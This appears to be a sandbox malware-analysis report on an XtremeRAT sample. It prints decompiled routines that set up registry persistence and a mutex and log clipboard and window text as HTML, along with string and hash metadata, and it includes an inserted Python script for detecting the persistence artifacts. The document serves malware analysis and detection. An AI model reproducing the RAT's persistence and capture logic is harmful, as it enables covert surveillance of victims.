                  				E10005EB4(_t223,  &_v5036, 0x1390, 0);
                  				E100034B0( &_v5672, 0x3d,  &_v1026);
                  				E1000352C( &_v5668, _v5672, "SOFTWARE\\");
                  				E100038FC( &_v5664, _v5668);
                  				E1000577C(0x80000001, _t329, L"InstalledServer", _v5664, _t448, _t466, 2, _v8);
                  				_push(E1000391C(_v12) + _t236);
                  				E10004584();
                  				_push(E1000391C(_v12) + _t241);
                  				E100050D0(_v28, E1000390C(_v12));
                  				if(0 == 0) {
                  					_t449 = 0;
                  					do {
                  						E10005954(0,  &_v5676);
                  						_t273 = E1000BD60(_v28, _t329, _v5676, _t446, _t449, 0);
                  						_t449 = _t449 + 1;
                  					} while (_t449 <= 0xa && _t273 != 1);
                  				}
                  				_push(_v24);
                  				L10004DC0();
                  				L10004E38();
                  				_t412 = 0;
                  				 *[fs:eax] = _t412;
                  				_push(E1000C85A);
                  				E10003770( &_v5676);
                  				E100032F0( &_v5672, 2);
                  				E10003788( &_v5664, 4);
                  				E100032F0( &_v5648, 2);
                  				E10003788( &_v5640, 3);
                  				E100032F0( &_v5628, 2);
                  				E10003788( &_v5620, 0xe);
                  				E10003770( &_v5040);
                  				_t419 =  *0x1000bd14; // 0x1000bd18
                  				E10004590( &_v28, _t419);
                  				return E10003788( &_v20, 4);
                  			}
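A triage script for the persistence the two decompiled routines above set up. It is an added example, not code from this report or from the sample, and it rests on inferences from the decompilation: the calls taking 0x80000001 (HKEY_CURRENT_USER) together with the value names ServerName, ServerStarted and InstalledServer are read as registry writes under HKCU\SOFTWARE\<install name>; the Active Setup "Installed Components" key with its StubPath value and the CurrentVersion\Run key are read as the autostart entries; and the <name>.cfg / .xtr / .dat strings built next to "\Microsoft\Windows\" are read as a configuration triad. Every key name, file name and path in the sample data is constructed, and the .reg parser covers only the subset of the export format needed here.

```python
"""Offline triage for the persistence artifacts seen in the decompiled installer.
Added example, not part of the sandbox report. Input is the text of
`reg export HKCU\Software hkcu_software.reg` (UTF-16 on disk; decode it first)
plus a directory listing, so it runs without touching a live registry.
All sample data below is constructed for the example."""
from dataclasses import dataclass, field

# Value names the installer writes side by side under HKCU\SOFTWARE\<install name>
XTREME_VALUE_NAMES = {"servername", "serverstarted", "installedserver"}
ACTIVE_SETUP = r"software\microsoft\active setup\installed components"
RUN_KEY = r"software\microsoft\windows\currentversion\run"


@dataclass
class Finding:
    key: str
    reason: str
    values: dict = field(default_factory=dict)


def parse_reg_export(text: str) -> dict:
    """Parse the .reg subset needed here: [key] headers and "name"=value lines.
    Returns {key_path: {value_name: raw_value}}; wrapped hex values (trailing
    backslash continuation) are joined back into one line."""
    keys, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and line.startswith(('"', "@")) and "=" in line:
            name, _, value = line.partition("=")
            keys[current][name.strip('"')] = value
    return keys


def unescape_sz(value: str) -> str:
    """Strip the quotes and backslash escaping of a REG_SZ literal; hex:/dword:
    values are returned unchanged."""
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        return value[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    return value


def find_xtreme_persistence(keys: dict) -> list:
    """Return Findings for the three registry artifacts the installer leaves behind."""
    findings = []
    for key, values in keys.items():
        names = {n.lower(): n for n in values}  # case-insensitive name lookup
        # 1. HKCU\SOFTWARE\<name>\ServerName / ServerStarted / InstalledServer
        hits = XTREME_VALUE_NAMES & set(names)
        if hits:
            findings.append(Finding(key, "server bookkeeping values: " + ", ".join(sorted(hits)),
                                    {names[h]: unescape_sz(values[names[h]]) for h in hits}))
        # 2. Active Setup StubPath under HKCU (re-run at every logon of that user)
        if ACTIVE_SETUP in key.lower() and "stubpath" in names:
            findings.append(Finding(key, "Active Setup StubPath in HKCU",
                                    {"StubPath": unescape_sz(values[names["stubpath"]])}))
    # 3. Run-key entries that point at the binary recorded in InstalledServer
    installed = {v.lower() for f in findings for n, v in f.values.items()
                 if n.lower() == "installedserver"}
    for key, values in keys.items():
        if key.lower().endswith(RUN_KEY):
            for name, raw in values.items():
                if unescape_sz(raw).lower() in installed:
                    findings.append(Finding(key, f"Run value {name!r} launches the installed server",
                                            {name: unescape_sz(raw)}))
    return findings


def find_config_triad(paths) -> list:
    """Flag <name>.cfg + .xtr + .dat sets inside a ...\\Microsoft\\Windows folder, the
    three files the non-executed routine assembles from its configured name."""
    by_stem = {}
    for p in paths:
        folder, _, fname = p.replace("/", "\\").rpartition("\\")
        stem, dot, ext = fname.rpartition(".")
        if dot and folder.lower().endswith(r"\microsoft\windows"):
            by_stem.setdefault(folder + "\\" + stem, set()).add(ext.lower())
    return sorted(s for s, exts in by_stem.items() if {"cfg", "xtr", "dat"} <= exts)


# Constructed sample data (not taken from the analysed host)
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\ExampleServer]
"ServerName"="C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\server.exe"
"InstalledServer"="C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\server.exe"
"ServerStarted"=hex:31,32,33,34,35,36,37,38,39,30,31,32,33,34,35,36,\
  37,38,39,30

[HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{00000000-EXAMPLE-GUID}]
"StubPath"="C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\server.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ExampleServer"="C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\server.exe"
"OneDrive"="C:\\Users\\victim\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"
'''
SAMPLE_PATHS = [
    r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\server.exe",
    r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\ExampleServer.cfg",
    r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\ExampleServer.xtr",
    r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\ExampleServer.dat",
    r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\x.dat",
]

if __name__ == "__main__":
    for f in find_xtreme_persistence(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"[{f.reason}] {f.key} -> {f.values}")
    for stem in find_config_triad(SAMPLE_PATHS):
        print(f"[config triad] {stem}.{{cfg,xtr,dat}}")
```

The three registry checks are deliberately independent: the bookkeeping key is the strongest signal (no legitimate software writes ServerName, ServerStarted and InstalledServer together under its own HKCU\SOFTWARE key), while a Run value or an HKCU Active Setup StubPath is only reported in relation to it or on its own as a weaker lead. The mutex-style check in the decompilation (a create call whose 0xb7 result, ERROR_ALREADY_EXISTS, short-circuits the install) leaves no on-disk artifact and is therefore not covered by the script.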
                  0x1000c7b3
                  0x1000c7b6
                  0x1000c7b9
                  0x1000c7c4
                  0x1000c7d4
                  0x1000c7e4
                  0x1000c7f4
                  0x1000c804
                  0x1000c814
                  0x1000c824
                  0x1000c82f
                  0x1000c837
                  0x1000c83d
                  0x1000c84f

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .cfg$.dat$.xtr$InstalledServer$SOFTWARE\$ServerName$ServerStarted$\Microsoft\Windows\$advapi32.dll$comctl32.dll$gdi32.dll$kernel32.dll$mpr.dll$msimg32.dll$opengl32.dll$shell32.dll$user32.dll$version.dll$wintrust.dll
                  • API String ID: 0-3293355523
                  • Opcode ID: bde0dd1c3b5265f9cabb2d91f526b3a14c8d9b38cf1c088a702092fb281a6550
                  • Instruction ID: 1bb01a822c3cd363219a61f58cecc4d3cd4d7df1aa5892b4b649a7b9097d74e2
                  • Opcode Fuzzy Hash: bde0dd1c3b5265f9cabb2d91f526b3a14c8d9b38cf1c088a702092fb281a6550
                  • Instruction Fuzzy Hash: 58128D7890025D9BEB21DB50CC82EDEB3B9EF84381F4080E5E5096B299DB71BF858F55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 43%
                  			E10008568(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                  				intOrPtr _v8;
                  				char _v12;
                  				char _v16;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				char _v32;
                  				char _v36;
                  				char _v40;
                  				intOrPtr _v44;
                  				char _v300;
                  				intOrPtr _v304;
                  				char _v308;
                  				char _v312;
                  				char _v316;
                  				char _v320;
                  				char _v324;
                  				char _v328;
                  				char _v332;
                  				char _v336;
                  				char _v340;
                  				char _v344;
                  				char _v348;
                  				char _v352;
                  				char _v356;
                  				char _v360;
                  				char _v364;
                  				char _v368;
                  				char _v372;
                  				char _v376;
                  				char _v380;
                  				char _v384;
                  				intOrPtr _t100;
                  				intOrPtr _t101;
                  				intOrPtr _t109;
                  				intOrPtr _t110;
                  				void* _t119;
                  				intOrPtr _t131;
                  				intOrPtr _t147;
                  				intOrPtr _t149;
                  				intOrPtr _t150;
                  				intOrPtr _t154;
                  				char _t168;
                  				intOrPtr _t177;
                  				intOrPtr _t178;
                  				intOrPtr _t179;
                  				intOrPtr _t187;
                  				intOrPtr _t188;
                  				intOrPtr _t189;
                  				intOrPtr _t206;
                  				intOrPtr _t225;
                  				intOrPtr _t233;
                  				intOrPtr _t242;
                  				intOrPtr _t243;
                  				void* _t244;
                  				void* _t245;
                  				intOrPtr _t248;
                  				intOrPtr _t259;
                  				intOrPtr _t266;
                  				intOrPtr _t278;
                  				intOrPtr _t279;
                  				intOrPtr _t280;
                  				intOrPtr _t305;
                  				intOrPtr _t307;
                  				intOrPtr _t308;
                  				void* _t310;
                  
                  				_t304 = __esi;
                  				_t303 = __edi;
                  				_t307 = _t308;
                  				_t245 = 0x2f;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t245 = _t245 - 1;
                  				} while (_t245 != 0);
                  				_push(_t245);
                  				_push(__ebx);
                  				_push(__esi);
                  				_t242 = _a16;
                  				_t100 = _a8;
                  				_push(_t307);
                  				_push(0x10008ba5);
                  				_push( *[fs:edx]);
                  				 *[fs:edx] = _t308;
                  				_t310 = _t100 -  *0x1000f68c; // 0xc1b9
                  				if(_t310 != 0) {
                  					__eflags = _t100 -  *0x1000f690; // 0xc1ba
                  					if(__eflags != 0) {
                  						__eflags = _t100 -  *0x1000f694; // 0xc1bc
                  						if(__eflags != 0) {
                  							__eflags = _t100 -  *0x1000f698; // 0x0
                  							if(__eflags != 0) {
                  								__eflags = _t100 -  *0x1000f69c; // 0xc1bd
                  								if(__eflags != 0) {
                  									__eflags = _t100 - 0x308;
                  									if(_t100 != 0x308) {
                  										__eflags = _t100 -  *0x1000f6a0; // 0xc1be
                  										if(__eflags != 0) {
                  											_push(_t242);
                  											_push(_a12);
                  											_push(_t100);
                  											_t101 = _a4;
                  											_push(_t101);
                  											L10004FE0();
                  											_v8 = _t101;
                  										} else {
                  											__eflags =  *0x1000e0b8;
                  											if( *0x1000e0b8 != 0) {
                  												_push(0);
                  												_push(0);
                  												_push(0);
                  												_t109 =  *0x1000e0b8; // 0x0
                  												_push(_t109);
                  												L10004F38();
                  												_t110 =  *0x1000e0b8; // 0x0
                  												_push(_t110);
                  												L10004F18();
                  												 *0x1000f6c4 = 0;
                  												 *0x1000f6c8 = 0;
                  												__eflags =  *0x1000f6c1 - 1;
                  												if(__eflags == 0) {
                  													E10006710( &_v380, _t245, 0,  *0x1000f6c4,  *0x1000f6c8);
                  													_t248 =  *0x1000f6b4; // 0x0
                  													E10003988( &_v384, _t248, L"SOFTWARE\\", __eflags);
                  													E1000577C(0x80000001, _t242, L"LastSize", _v384, __esi, __eflags, 2, _v380);
                  												}
                  											}
                  										}
                  									} else {
                  										__eflags =  *0x1000f6d4;
                  										if( *0x1000f6d4 != 0) {
                  											_t119 = E100069DC(0, _t242,  &_v12, __esi);
                  											__eflags = _t119 - 1;
                  											if(_t119 == 1) {
                  												_t266 =  *0x1000e0b4; // 0x0
                  												E10003A34(_v12, _t266);
                  												if(__eflags != 0) {
                  													E100037AC(0x1000e0b4, _v12);
                  													E10008270(L"\r\n\r\n", _t242,  &_v352, __edi, _t304);
                  													_push(_v352);
                  													_push(L"<FONT COLOR=\"red\">[Clipboard");
                  													_push(L" --- ");
                  													E10006B14(0x2f, _t242, 0x3a, 0x20, __edi, _t304,  &_v356);
                  													_push(_v356);
                  													_push(L"]</font>");
                  													E10008270(0x10008bcc, _t242,  &_v360, _t303, _t304);
                  													_push(_v360);
                  													_t131 =  *0x1000e0b4; // 0x0
                  													E10008270(_t131, _t242,  &_v364, _t303, _t304);
                  													_push(_v364);
                  													E10008270(0x10008bcc, _t242,  &_v368, _t303, _t304);
                  													_push(_v368);
                  													_push(L"<FONT COLOR=\"red\">[Clipboard End]</font>");
                  													E10008270(L"\r\n\r\n", _t242,  &_v372, _t303, _t304);
                  													_push(_v372);
                  													E100039EC();
                  													__eflags =  *0x1000e0b8 - 0xffffffff;
                  													if(__eflags != 0) {
                  														E100061F8(_v12,  &_v376, __eflags);
                  														E100037D0( &_v12, _v376);
                  														_push(0);
                  														_push( &_v32);
                  														_t147 = E1000391C(_v12) + _t146;
                  														__eflags = _t147;
                  														_push(_t147);
                  														_push(_v12);
                  														_t149 =  *0x1000e0b8; // 0x0
                  														_push(_t149);
                  														L10004FA0();
                  													}
                  													E100037AC(0x1000f6d0, L"qualquercoisarsrsr");
                  												}
                  											}
                  										}
                  									}
                  								} else {
                  									__eflags =  *0x1000f6d4;
                  									if( *0x1000f6d4 != 0) {
                  										_t150 =  *0x1000f69c; // 0xc1bd
                  										_v8 = _t150 + 1;
                  									}
                  								}
                  							} else {
                  								__eflags =  *0x1000f6d4;
                  								if( *0x1000f6d4 != 0) {
                  									_t100 =  *0x1000f6d4; // 0x0
                  									_push(_t100);
                  									L100050B8();
                  								}
                  								_push(0);
                  								_push(0);
                  								L10004EA0();
                  								_push(_t100);
                  								_push(E10008040);
                  								_push(0xd);
                  								L100050A0();
                  								 *0x1000f6d4 = E10008040;
                  							}
                  						} else {
                  							__eflags =  *0x1000f6d4;
                  							if( *0x1000f6d4 != 0) {
                  								_t154 =  *0x1000f6d4; // 0x0
                  								_push(_t154);
                  								L100050B8();
                  							}
                  							 *0x1000f6d4 = 0;
                  						}
                  						goto L42;
                  					} else {
                  						E10003770( &_v12);
                  						__eflags =  *0x1000f6d4;
                  						if( *0x1000f6d4 != 0) {
                  							_t189 =  *0x1000f6d4; // 0x0
                  							_push(_t189);
                  							L100050B8();
                  						}
                  						__eflags =  *0x1000e0b8 - 0xffffffff;
                  						if(__eflags != 0) {
                  							_push(0);
                  							_push(0);
                  							_push(0);
                  							_t178 =  *0x1000e0b8; // 0x0
                  							_push(_t178);
                  							L10004F38();
                  							_push(0);
                  							_t179 =  *0x1000e0b8; // 0x0
                  							_push(_t179);
                  							L10004E80();
                  							__eflags = 0;
                  							_v28 = _t179;
                  							_v24 = 0;
                  							E10003BE4( &_v12, E10003FD4(_v28, _v24, 2, 0));
                  							_push(0);
                  							_push( &_v32);
                  							_push(_v28);
                  							_push(_v12);
                  							_t187 =  *0x1000e0b8; // 0x0
                  							_push(_t187);
                  							L10004F00();
                  							_push(2);
                  							_push(0);
                  							_push(0);
                  							_t188 =  *0x1000e0b8; // 0x0
                  							_push(_t188);
                  							L10004F38();
                  						}
                  						_push(0x80);
                  						_t278 =  *0x1000f684; // 0x0
                  						E10003988( &_v336, L"temp", _t278, __eflags);
                  						_push(E1000390C(_v336));
                  						L10004F30();
                  						_t279 =  *0x1000f684; // 0x0
                  						E10003988( &_v340, L"temp", _t279, __eflags);
                  						_push(E1000390C(_v340));
                  						L10004E30();
                  						_push(0);
                  						_push(0);
                  						_push(2);
                  						_push(0);
                  						_push(0);
                  						_push(0x40000000);
                  						_t280 =  *0x1000f684; // 0x0
                  						E10003988( &_v344, L"temp", _t280, __eflags);
                  						_t168 = E1000390C(_v344);
                  						_push(_t168);
                  						L10004DE0();
                  						_t243 = _t168;
                  						__eflags = _t243 - 0xffffffff;
                  						if(__eflags != 0) {
                  							E100061F8(_v12,  &_v348, __eflags);
                  							E100037D0( &_v12, _v348);
                  							_push(0);
                  							_push( &_v32);
                  							_t177 = E1000391C(_v12) + _t176;
                  							__eflags = _t177;
                  							_push(_t177);
                  							_t168 = _v12;
                  							_push(_t168);
                  							_push(_t243);
                  							L10004FA0();
                  						}
                  						_push(_t243);
                  						L10004DC0();
                  						_push(0);
                  						_push(0);
                  						L10004EA0();
                  						_push(_t168);
                  						_push(E10008040);
                  						_push(0xd);
                  						L100050A0();
                  						 *0x1000f6d4 = E10008040;
                  						L42:
                  						_pop(_t259);
                  						 *[fs:eax] = _t259;
                  						_push(E10008BAC);
                  						E10003788( &_v384, 0x13);
                  						E10003788( &_v40, 2);
                  						return E10003788( &_v16, 2);
                  					}
                  				}
                  				_t305 = _t242;
                  				E100050D0( &_v308, _t305);
                  				_push(0x8000);
                  				_push(0);
                  				_push(_t305);
                  				L10004F80();
                  				E10006E78(_t242, __edi, _t305,  &_v36, _v308, _v304,  &_v300, _v44);
                  				E100037D0( &_v40, _v36);
                  				E10006974( &_v16);
                  				_t244 = E10008438(_v16, _t242, __edi, _t305);
                  				_t206 =  *0x1000f6d0; // 0x0
                  				E10003A34(_t206, _v16);
                  				if(_t310 == 0) {
                  					L6:
                  					E10003770( &_v16);
                  					L7:
                  					E10003A34(_v40, 0);
                  					if(0 != 0) {
                  						_t313 = _t244 - 1;
                  						if(_t244 == 1) {
                  							E10008270(_v36, _t244,  &_v328, _t303, _t305);
                  							E10003988( &_v12, _v328, _v16, _t313);
                  							_t314 =  *0x1000e0b8 - 0xffffffff;
                  							if( *0x1000e0b8 != 0xffffffff) {
                  								E100061F8(_v12,  &_v332, _t314);
                  								E100037D0( &_v12, _v332);
                  								_push(0);
                  								_push( &_v32);
                  								_push(E1000391C(_v12) + _t222);
                  								_push(_v12);
                  								_t225 =  *0x1000e0b8; // 0x0
                  								_push(_t225);
                  								L10004FA0();
                  							}
                  						}
                  					}
                  					goto L42;
                  				}
                  				E10003A34(_v40, 0);
                  				if(0 == 0) {
                  					goto L6;
                  				} else {
                  					E100037AC(0x1000f6d0, _v16);
                  					_push(L"\r\n\r\n");
                  					_push(_v16);
                  					_push(0x10008bcc);
                  					_push(_v36);
                  					E100039EC();
                  					E10008270(L"\r\n\r\n", _t244,  &_v312, _t303, _t305);
                  					_push(_v312);
                  					_push(L"<FONT COLOR=\"blue\">[");
                  					_t233 =  *0x1000f6d0; // 0x0
                  					E10008270(_t233, _t244,  &_v316, _t303, _t305);
                  					_push(_v316);
                  					_push(0x10008c08);
                  					_push(L" --- ");
                  					E10006B14(0x2f, _t244, 0x3a, 0x20, _t303, _t305,  &_v320);
                  					_push(_v320);
                  					_push(L"</font>");
                  					E10008270(0x10008bcc, _t244,  &_v324, _t303, _t305);
                  					_push(_v324);
                  					E100039EC();
                  					goto L7;
                  				}
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $ --- $</font>$<FONT COLOR="blue">[$<FONT COLOR="red">[Clipboard$<FONT COLOR="red">[Clipboard End]</font>$LastSize$SOFTWARE\$]</font>$qualquercoisarsrsr$temp
                  • API String ID: 0-3009520543
                  • Opcode ID: 779d53ca8fe55552b1ceab16a14ff218901e1d0717973ec1ab609bf966c74ce1
                  • Instruction ID: 057d20e264fa80afaee32c8a6c883f4daf1d9cc34b90863f49a2566050bc1c08
                  • Opcode Fuzzy Hash: 779d53ca8fe55552b1ceab16a14ff218901e1d0717973ec1ab609bf966c74ce1
                  • Instruction Fuzzy Hash: 6DF16F74A00219ABFB51DB64CC81FDE73B9FB083C0F508065F148A72ADDB75AE858B65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 57%
                  			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				char _v24;
                  				char _v28;
                  				char _v32;
                  				void _v5040;
                  				char _v5044;
                  				char _v5048;
                  				void _v5572;
                  				char _v5576;
                  				char _v5580;
                  				char _v5584;
                  				char _v5588;
                  				char _v5592;
                  				char _v5596;
                  				char _v5600;
                  				char _v5604;
                  				char* _t62;
                  				void* _t120;
                  				void* _t122;
                  				intOrPtr* _t147;
                  				intOrPtr* _t150;
                  				void* _t163;
                  				intOrPtr _t164;
                  				intOrPtr _t167;
                  				void* _t230;
                  				void* _t231;
                  				void* _t232;
                  				void* _t233;
                  				intOrPtr _t287;
                  				intOrPtr _t291;
                  				void* _t322;
                  				void* _t326;
                  				void* _t335;
                  				intOrPtr _t340;
                  				intOrPtr _t341;
                  				void* _t343;
                  				void* _t354;
                  
                  				_t229 = __ebx;
                  				_t340 = _t341;
                  				_t233 = 0x2bc;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t233 = _t233 - 1;
                  				} while (_t233 != 0);
                  				_push(__ebx);
                  				E10004CE4(E1000D030);
                  				_push(_t340);
                  				_push(0x1000d759);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t341;
                  				E10003024(0x1000d0d0);
                  				_t62 =  *0x1000e134; // 0x1000e020
                  				 *_t62 = 1;
                  				_push(0x8007);
                  				L10004F20();
                  				E10005954(1,  &_v24);
                  				E10003A34(_v24, L"restart");
                  				if(0 == 0) {
                  					E10005954(0,  &_v28);
                  					E100037AC(0x10012580, _v28);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(E1000390C( *0x10012580));
                  					_push(L"open");
                  					_push(0);
                  					L1000B6F8();
                  					_push(0);
                  					L10004E38();
                  				}
                  				E10005954(1,  &_v32);
                  				E10003A34(_v32, L"update");
                  				if(0 == 0) {
                  					_push(0x1770);
                  					L10004F58();
                  				}
                  				E100050D8();
                  				E100051E8(0,  &_v5040);
                  				memcpy(0x1000f834,  &_v5040, 0x4e4 << 2);
                  				_t322 = 0x1000f834;
                  				E10003BE4(0x10012580, 0x9c8);
                  				E100050D0(E1000390C( *0x10012580), _t322);
                  				E10006234( *0x10012580, _t229,  &_v5044, L"CONFIG",  &_v5040, 0);
                  				E100037AC(0x10012580, _v5044);
                  				E100050D8();
                  				E100050D0(_t322, E1000390C( *0x10012580));
                  				_t334 = _t322;
                  				memcpy(0x10010dd4, _t322, 0x4e4 << 2);
                  				_t343 = _t341 + 0x18;
                  				_t326 = _t322;
                  				E100037AC(0x100432d4, L"SOFTWARE\\XtremeRAT");
                  				_push(E1000390C( *0x100432d4));
                  				L1000C070();
                  				_t13 = _t326 + 0xfaa; // 0x100107de
                  				E100038E0(0x100432d4, 0x3d, _t13);
                  				E1000577C(0x80000001, _t229, L"Mutex", L"SOFTWARE\\XtremeRAT", _t322, 0, 2,  *0x100432d4);
                  				E10005664( &_v5572);
                  				E100038E0( &_v5048, 0x105,  &_v5572);
                  				E10003928( &_v5048, 0x105, L"\\Microsoft\\Windows\\", 0);
                  				if(E10005690(E1000390C(_v5048), 0x80000001) != 1) {
                  					E10005664( &_v5572);
                  					E100038E0( &_v5584, 0x105,  &_v5572);
                  					_push(_v5584);
                  					_push( *0x1000e0f8);
                  					_t31 = _t326 + 0xfaa; // 0x100107de
                  					_t245 = 0x3d;
                  					E100038E0( &_v5588, 0x3d, _t31);
                  					_push(_v5588);
                  					_push(L".cfg");
                  					E100039EC();
                  				} else {
                  					E10005664( &_v5572);
                  					E100038E0( &_v5576, 0x105,  &_v5572);
                  					_push(_v5576);
                  					_push(L"\\Microsoft\\Windows\\");
                  					_t24 = _t326 + 0xfaa; // 0x100107de
                  					_t245 = 0x3d;
                  					E100038E0( &_v5580, 0x3d, _t24);
                  					_push(_v5580);
                  					_push(L".cfg");
                  					E100039EC();
                  				}
                  				_t230 = E1000390C( *0x10012584);
                  				_t120 = E10005CA4(_t230);
                  				_t349 = _t120;
                  				if(_t120 != 0) {
                  					_push(0x80);
                  					_push(_t230);
                  					L10004F30();
                  					 *0x100432cc = E1000CF04(_t230, 0x10012588);
                  					 *0x100432d0 = 0x10012588;
                  					E10005F1C( *0x10012584, _t230, _t245, _t334);
                  					E10003BE4(0x10012580, E10003FD4( *0x100432cc,  *0x100432d0, 2, 0));
                  					E100050D0(E1000390C( *0x10012580), 0x10012588);
                  					E10006234( *0x10012580, _t230,  &_v5592, L"CONFIG", _t334, _t349);
                  					E100037AC(0x10012580, _v5592);
                  					E100050D8();
                  					E100050D0(_t326, E1000390C( *0x10012580));
                  				}
                  				if( *((intOrPtr*)(_t326 + 0x1388)) != 0x1e240) {
                  					_push(0x80);
                  					_push(_t230);
                  					L10004F30();
                  					_push(_t230);
                  					L10004E30();
                  					E100050D8();
                  					E100051E8(0,  &_v5040);
                  					memcpy(_t326,  &_v5040, 0x4e4 << 2);
                  					_t343 = _t343 + 0xc;
                  					_t326 = _t326;
                  					E10003BE4(0x10012580, 0x9c8);
                  					E100050D0(E1000390C( *0x10012580), _t326);
                  					E10006234( *0x10012580, _t230,  &_v5596, L"CONFIG",  &_v5040, 0);
                  					E100037AC(0x10012580, _v5596);
                  					E100050D8();
                  					E100050D0(_t326, E1000390C( *0x10012580));
                  				}
                  				_t41 = _t326 + 0xfaa; // 0x100107de
                  				_t122 = E10004DF0(0, 0, _t41);
                  				_t231 = _t122;
                  				L10004E88();
                  				if(_t122 == 0xb7) {
                  					_push(0);
                  					L10004E38();
                  				}
                  				_push(_t231);
                  				L10004DC0();
                  				if( *((char*)(_t326 + 0xfa8)) == 1) {
                  					_t43 = _t326 + 0x109e; // 0x100108d2
                  					_t163 = E10004DF0(0, 0, _t43);
                  					_t231 = _t163;
                  					L10004E88();
                  					_t354 = _t163 - 0xb7;
                  					if(_t354 == 0) {
                  						_push(_t231);
                  						L10004DC0();
                  					} else {
                  						_push(_t231);
                  						L10004DC0();
                  						_t164 =  *0x1000e0f4; // 0x781894
                  						_push(E1000391C(_t164) + _t165);
                  						_t167 =  *0x1000e0f4; // 0x781894
                  						E100050D0(0x10012374, E1000390C(_t167));
                  						E100098A8(E10009950(0x10012374), _t326, E1000C9D0);
                  					}
                  				}
                  				_push(0x20a);
                  				_push(0x10010bc4);
                  				_push(0);
                  				L10004E98();
                  				_t45 = _t326 + 0xbd2; // 0x10010406
                  				E100038E0( &_v5600, 0x3d, _t45);
                  				_t287 =  *0x1000e0f0; // 0x781bb4
                  				E10003A34(_v5600, _t287);
                  				if(_t354 != 0) {
                  					_t48 = _t326 + 0xbd2; // 0x10010406
                  					E100038E0( &_v5604, 0x3d, _t48);
                  					_t289 =  *0x1000e0ec; // 0x77316c
                  					E10003A34(_v5604, _t289);
                  					if(__eflags != 0) {
                  						_t53 = _t326 + 0xbd2; // 0x10010406
                  						_t289 = _t53;
                  						E100050D0(0x10012164, _t53);
                  						_t335 = E10009950(0x10012164);
                  					} else {
                  						E100054C4( &_v5572, __eflags);
                  						memcpy(0x10012164,  &_v5572, 0x82 << 2);
                  						asm("movsw");
                  						_t326 = _t326;
                  						_t335 = E10009950(0x10012164);
                  					}
                  				} else {
                  					_t335 = 0;
                  				}
                  				 *0x10012370 = 0;
                  				if(_t335 != 0) {
                  					while(1) {
                  						_t290 = E1000C080;
                  						_t232 = E100098A8(_t335, 0x10010bc4, E1000C080);
                  						__eflags = _t232;
                  						if(_t232 == 0) {
                  							_t150 =  *0x1000e0fc; // 0x1000e000
                  							_push( *_t150);
                  							_push(_t335);
                  							L10004F60();
                  							_t335 = E10009950(0x10012164);
                  							_push(0x1f4);
                  							L10004F58();
                  						}
                  						 *0x10012370 =  *0x10012370 + 1;
                  						__eflags = _t232;
                  						if(_t232 != 0) {
                  							break;
                  						}
                  						__eflags =  *0x10012370 - 7;
                  						if( *0x10012370 < 7) {
                  							continue;
                  						}
                  						break;
                  					}
                  					E1000B78C(_t326, _t232, _t290, _t326, _t335);
                  					__eflags = _t232;
                  					if(_t232 == 0) {
                  						_t147 =  *0x1000e0fc; // 0x1000e000
                  						_push( *_t147);
                  						_push(_t335);
                  						L10004F60();
                  						E1000C080(_t232, _t326, _t335, 0x10010bc4);
                  					}
                  					goto L32;
                  				} else {
                  					E1000B78C(_t326, _t231, _t289, _t326, _t335);
                  					E1000C080(_t231, _t326, _t335, 0x10010bc4);
                  					L32:
                  					_pop(_t291);
                  					 *[fs:eax] = _t291;
                  					_push(E1000D760);
                  					E10003788( &_v5604, 8);
                  					E10003788( &_v5048, 2);
                  					return E10003788( &_v32, 3);
                  				}
			}

			Instruction address column (one address per decompiled line above; per-line alignment lost in extraction): 0x1000d0f4 through 0x1000d758.

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .cfg$CONFIG$HgDdsuTd$HgDdsuTdPERSIST$Mutex$SOFTWARE\XtremeRAT$\Microsoft\Windows\$l1w$open$restart$update
                  • API String ID: 0-1447232261
                  • Opcode ID: b25be51fba2d0f65df071fbb7db729566f5925429d87ceaf1aa7f8b9bf906716
                  • Instruction ID: 7babdffad351a71ae314de662e95e98ead1dbb94228c143735747afee298a140
                  • Opcode Fuzzy Hash: b25be51fba2d0f65df071fbb7db729566f5925429d87ceaf1aa7f8b9bf906716
                  • Instruction Fuzzy Hash: E2E1B5787005559BF715E764CC82B9FB3AAEB803C0F508061F5489B29EEEB5FE418B61
                  Uniqueness

